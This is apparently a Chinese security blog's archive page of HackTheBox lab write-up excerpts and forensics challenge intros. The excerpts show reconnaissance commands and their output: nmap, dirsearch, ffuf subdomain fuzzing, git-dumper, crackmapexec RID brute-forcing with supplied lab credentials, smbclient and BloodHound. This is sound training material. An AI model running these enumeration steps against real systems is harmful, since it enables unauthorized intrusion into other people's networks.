Output File: /home/kali/Psycho/reports/_172.17.0.2/_25-02-21_15-09-17.txt

Target: http://172.17.0.2/

[15:09:17] Starting: 
[15:09:18] 403 - 275B  - /.ht_wsr.txt                                      
[15:09:18] 403 - 275B  - /.htaccess.bak1                                   
[15:09:18] 403 - 275B  - /.htaccess.orig
[15:09:18] 403 - 275B  - /.htaccess.sample                                 
[15:09:18] 403 - 275B  - /.htaccess.save
[15:09:18] 403 - 275B  - /.htaccess_extra                                  
[15:09:18] 403 - 275B  - /.htaccess_sc                                     
[15:09:18] 403 - 275B  - /.htaccessOLD
[15:09:18] 403 - 275B  - /.htaccessOLD2                                    
[15:09:18] 403 - 275B  - /.htm                                             
[15:09:18] 403 - 275B  - /.html
[15:09:18] 403 - 275B  - /.htaccessBAK
[15:09:18] 403 - 275B  - /.htpasswds                                       
[15:09:18] 403 - 275B  - /.httr-oauth                                      
[15:09:18] 403 - 275B  - /.htpasswd_test                                   
[15:09:18] 403 - 275B  - /.php                                             
[15:09:21] 403 - 275B  - /.htaccess_orig                                   
[15:09:24] 301 - 309B  - /assets  ->  http://172.17.0.2/assets/            
[15:09:24] 200 - 458B  - /assets/                                          
[15:09:38] 403 - 275B  - /server-status                                    
[15:09:38] 403 - 275B  - /server-status/                                   
                                                                             
Task Completed

在网页源码底部发现了一个ERROR，意味着是不是他的调用方式有什么问题？或者什么参数有问题？

CommonCollections-1

Tue, 18 Feb 2025 00:00:00 +0000

About

本文是关于Apache commons collections反序列漏洞利用链的过程复现

Environment

JDK version	jdk-8u65-windows-x64
Common collections version	3.2.1

Java Archive Downloads - Java SE 8
oracle.com passwords - BugMeNot. (如果下载JDK需要登录，这里是免费的账户)

HTB-Titanic

Sun, 16 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/Titanic  
❯ nmap titanic.htb -sV -T4                                                                                                                    

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ReadAnyFiles

进入titanic.htb，点击Book Now，使用burpsuite进行抓包发现一个download路由

HTB-Cat

Thu, 13 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali  
❯ nmap cat.htb

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Dirsearch

存在git泄露

用git-dumper获取到源码

[root@kali] /home/kali/Cat  
❯ git-dumper http://cat.htb/.git/ ./catgit

XSS

在view_cat.php中发现存在XSS的可能性

DeepSeekAPI调用教程

Fri, 31 Jan 2025 00:00:00 +0000

前言

最近出来了一个新的国产AI模型DeepSeek，并且具有深度思考的功能。

我体验过后感觉比ChatGPT要好很多，体现在DeepSeek能更好的理解用户的问题。

HTB-Backfire

Mon, 20 Jan 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Backfire  
❯ nmap  backfire.htb -sV -Pn -T4  
                                                                                                                                                       
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
443/tcp  open     ssl/http nginx 1.22.1
5000/tcp filtered upnp
8000/tcp open     http     nginx 1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问backfire.htb:8000可以得到两个文件

HTB-Active

Sat, 18 Jan 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Easy

Nmap

[root@kali] /home/kali/Active  
❯ nmap active.htb -sV  -Pn -T4         
                                                                                            
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49167/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

SMB File Leak

匿名登陆SMB，发现可以读取的Replication

HTB-Blackfield

Sat, 18 Jan 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Hard

Nmap

[root@kali] /home/kali/Blackfield  
❯ nmap Blackfield.htb -sV -T4

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

把BLACKFIELD.local添加到**/etc/hosts**

HTB-Cascade

Sat, 18 Jan 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Medium

Nmap

[root@kali] /home/kali/Cascade  
❯ nmap Cascade.htb -sV -T4    

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

把cascade.local添加到**/etc/hosts**

HTB-Forest

Sat, 18 Jan 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Easy

Nmap

[root@kali] /home/kali/Forest  
❯ nmap forest.htb -sV -T4
 
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.68 seconds

将htb.local加入**/etc/hosts**

HTB-Headless

Sat, 18 Jan 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/Headless  
❯ nmap headless.htb      

Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

进入5000端口查看，自动跳转到一个support路由

Dirsearch

[root@kali] /home/kali/Headless  
❯ dirsearch -u headless.htb:5000                                                         
Target: http://headless.htb:5000/

Starting:                                                                                                        
401 - 317B  - /dashboard                                        
200 - 2KB - /support                                          
                                                                             
Task Completed

进入dashboard，发现需要身份认证

HTB-Resolute

Sat, 18 Jan 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Medium

Nmap

[root@kali] /home/kali/Resolute  
❯ nmap Resolute.htb -sV -T4

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

把megabank.local添加到**/etc/hosts**

HTB-Sauna

Sat, 18 Jan 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Easy

Nmap

[root@kali] /home/kali/Sauna  
❯ nmap Sauna.htb -sV -T4 

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

把EGOTISTICAL-BANK.LOCAL添加到**/etc/hosts**

HTB-EscapeTwo

Sun, 12 Jan 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Easy

As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

Nmap

root@kali: /home/kali/EscapeTwo  
➜   nmap EscapeTwo.htb -sV -Pn -T4
Nmap scan report for EscapeTwo.htb 

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB User Crack

root@kali: /home/kali/EscapeTwo  
➜   crackmapexec smb escapetwo.htb -u "rose" -p "KxEPkKe6R8su" --rid-brute | grep SidTypeUser

SMB    EscapeTwo.htb   445    DC01        500: SEQUEL\Administrator (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        501: SEQUEL\Guest (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        502: SEQUEL\krbtgt (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1000: SEQUEL\DC01$ (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1103: SEQUEL\michael (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1114: SEQUEL\ryan (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1116: SEQUEL\oscar (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1122: SEQUEL\sql_svc (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1601: SEQUEL\rose (SidTypeUser)
SMB    EscapeTwo.htb   445    DC01        1607: SEQUEL\ca_svc (SidTypeUser)

SMB File Leak

[root@kali] /home/kali/EscapeTwo  
❯ smbclient -L //10.10.xx.xx -U rose

Password for [WORKGROUP\rose]:

        Sharename       Type      Comment
        --------- ---- -------
        Accounting Department  Disk      
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk

在这个Accounting Department中存在表格文件

Sherlocks-Takedown

Sat, 04 Jan 2025 00:00:00 +0000

Sherlock Scenario

我们在网络活动中发现了一个异常模式，表明可能存在安全漏洞。我们的团队怀疑我们的系统遭到未经授权的入侵，可能会泄露敏感数据。您的任务是调查此事件。

Sherlocks-BFT

Sat, 28 Dec 2024 00:00:00 +0000

Sherlock Scenario

在这个 Sherlock 中，您将熟悉 **MFT（主文件表）**取证。您将了解用于分析 MFT 工件以识别恶意活动的知名工具和方法。在我们的分析过程中，您将使用 MFTECmd 工具解析提供的 MFT 文件，使用 TimeLine Explorer 打开并分析解析的 MFT 的结果，并使用十六进制编辑器从 MFT 中恢复文件内容。

Sherlocks-Unit42

Wed, 25 Dec 2024 00:00:00 +0000

Sherlock Scenario

在本 Sherlock 中，您将熟悉 Sysmon 日志和各种有用的 EventID，用于识别和分析 Windows 系统上的恶意活动。Palo Alto 的 Unit42 最近对 UltraVNC 活动进行了研究，其中攻击者利用 UltraVNC 的后门版本来维护对系统的访问。此实验室受该活动的启发，指导参与者完成活动的初始访问阶段。

HTB-Yummy

Tue, 24 Dec 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

[root@kali] /home/kali/Yummy  
❯ nmap yummy.htb -sSCV -Pn -T4 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 16:55 CST
Nmap scan report for yummy.htb (10.10.11.36)
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a2:ed:65:77:e9:c4:2f:13:49:19:b0:b8:09:eb:56:36 (ECDSA)
|_  256 bc:df:25:35:5c:97:24:f2:69:b4:ce:60:17:50:3c:f0 (ED25519)
80/tcp open  http    Caddy httpd
|_http-title: Yummy
|_http-server-header: Caddy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds

开放端口：22、80

HTB-UnderPass

Sun, 22 Dec 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/UnderPass  
❯ nmap underpass.htb -sSCV -Pn -T4                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-22 11:26 CST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.04 seconds

TCP开放端口：22、80

Sherlocks-Reaper

Sat, 21 Dec 2024 00:00:00 +0000

Sherlock Scenario

我们的SIEM提醒我们注意一个需要立即查看的可疑登录事件。警报详细信息是IP地址和源工作站名称不匹配。您将收到事件时间范围内周围时间的网络捕获和事件日志。对给定的证据进行核化，并向SOC经理报告。

HTB-Instant

Fri, 20 Dec 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Instant  
❯ nmap instant.htb -sSCV -Pn -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 11:39 CST
Nmap scan report for instant.htb (10.10.11.37)
Host is up (0.097s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
|_  256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
80/tcp open  http    Apache httpd 2.4.58
|_http-title: Instant Wallet
|_http-server-header: Apache/2.4.58 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.72 seconds

开放端口：22、80

Fortresses-Jet

Thu, 19 Dec 2024 00:00:00 +0000

About

达到HTB的Hacker等级后可以进入Advanced Labs，本文是关于Fortresses（堡垒）中的Jet挑战

Connect

Nmap扫描结果如下

[root@kali] /home/kali/Jet
❯ nmap 10.13.37.10 -T4 -Pn -sS                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 15:06 CST
Nmap scan report for jet.com (10.13.37.10)
Host is up (0.38s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
2222/tcp open  EtherNetIP-1
5555/tcp open  freeciv
7777/tcp open  cbt

使用浏览器打开80端口即可获得flag

HTB-Chemistry

Tue, 17 Dec 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap Chemistry.htb -sS -Pn -T4 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 20:11 CST
Nmap scan report for Chemistry.htb (10.10.11.38)
Host is up (0.10s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 1.78 seconds

开放端口：22、5000

HTB-Heal

Sun, 15 Dec 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Heal  
❯ nmap -sSCV -Pn heal.htb           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 17:29 CST
Nmap scan report for heal.htb (10.10.11.46)
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
|_  256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Heal
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.40 seconds

开放端口：22、80

Sherlocks-Brutus

Tue, 10 Dec 2024 00:00:00 +0000

Sherlock Scenario

在这个非常简单的 Sherlock 中，您将熟悉 Unix auth.log 和 wtmp 日志。我们将探索一个场景，其中 Confluence 服务器通过其 SSH 服务被暴力破解。获得对服务器的访问权限后，攻击者执行了其他活动，我们可以使用 auth.log 进行跟踪。尽管 auth.log 主要用于暴力分析，但我们将在调查中深入研究此工件的全部潜力，包括权限提升、持久性方面，甚至对命令执行的一些可见性。

HTB-LinkVortex

Mon, 09 Dec 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap -sSCV -Pn LinkVortex.htb 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 21:44 CST
Nmap scan report for LinkVortex.htb (10.10.11.47)
Host is up (0.088s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
| http-title: BitByBit Hardware
|_Requested resource was http://linkvortex.htb/
| http-robots.txt: 4 disallowed entries 
|_/ghost/ /p/ /email/ /r/
|_http-generator: Ghost 5.58
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds

Subdomain Fuzz

[root@kali] /home/kali/LinkVortex  
❯ ffuf -u http://linkvortex.htb/ -w ./fuzzDicts/subdomainDicts/main.txt -H "Host:FUZZ.linkvortex.htb"  -mc 200            ⏎

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://linkvortex.htb/
 :: Wordlist         : FUZZ: /home/kali/LinkVortex/fuzzDicts/subdomainDicts/main.txt
 :: Header           : Host: FUZZ.linkvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

dev                     [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 73ms]
:: Progress: [167378/167378] :: Job [1/1] :: 500 req/sec :: Duration: [0:05:55] :: Errors: 46 ::

发现存在：dev.linkvortex.htb，添加到/etc/hosts

HTB-Certified

Sun, 08 Dec 2024 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Medium

As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09

Nmap

┌──(root㉿kali)-[/home/kali/Certified]
└─# nmap -sSCV -Pn -p- Certified.htb     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-06 20:00 CST
Stats: 0:02:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.13% done; ETC: 20:02 (0:00:15 remaining)
Stats: 0:03:16 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.90% done; ETC: 20:04 (0:00:25 remaining)
Stats: 0:03:16 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 61.90% done; ETC: 20:04 (0:00:25 remaining)
Nmap scan report for Certified.htb (10.10.11.41)
Host is up (0.083s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-06 18:49:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-12-06T18:50:32+00:00; +6h45m59s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-12-06T18:50:32+00:00; +6h45m59s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-12-06T18:50:32+00:00; +6h45m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-12-06T18:50:32+00:00; +6h45m59s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49715/tcp open  msrpc         Microsoft Windows RPC
49737/tcp open  msrpc         Microsoft Windows RPC
49772/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-06T18:49:56
|_  start_date: N/A
|_clock-skew: mean: 6h45m58s, deviation: 0s, median: 6h45m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.91 seconds

GetAllUserName

┌──(root㉿kali)-[~kali/Certified]
└─# crackmapexec smb certified.htb -u "judith.mader" -p "judith09" --rid-brute | grep SidTypeUser
SMB  Certified.htb   445    DC01      500: CERTIFIED\Administrator (SidTypeUser)
SMB  Certified.htb   445    DC01      501: CERTIFIED\Guest (SidTypeUser)
SMB  Certified.htb   445    DC01      502: CERTIFIED\krbtgt (SidTypeUser)
SMB  Certified.htb   445    DC01      1000: CERTIFIED\DC01$ (SidTypeUser)
SMB  Certified.htb   445    DC01      1103: CERTIFIED\judith.mader (SidTypeUser)
SMB  Certified.htb   445    DC01      1105: CERTIFIED\management_svc(SidTypeUser)
SMB  Certified.htb   445    DC01      1106: CERTIFIED\ca_operator (SidTypeUser)
SMB  Certified.htb   445    DC01      1601: CERTIFIED\alexander.huges (SidTypeUser)
SMB  Certified.htb   445    DC01      1602: CERTIFIED\harry.wilson (SidTypeUser)
SMB  Certified.htb   445    DC01      1603: CERTIFIED\gregory.cameron (SidTypeUser)

Bloodhound

┌──(root㉿kali)-[~kali/Certified]
└─# bloodhound-python -u judith.mader -p 'judith09' -c All -d certified.htb -ns 10.10.11.41       
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
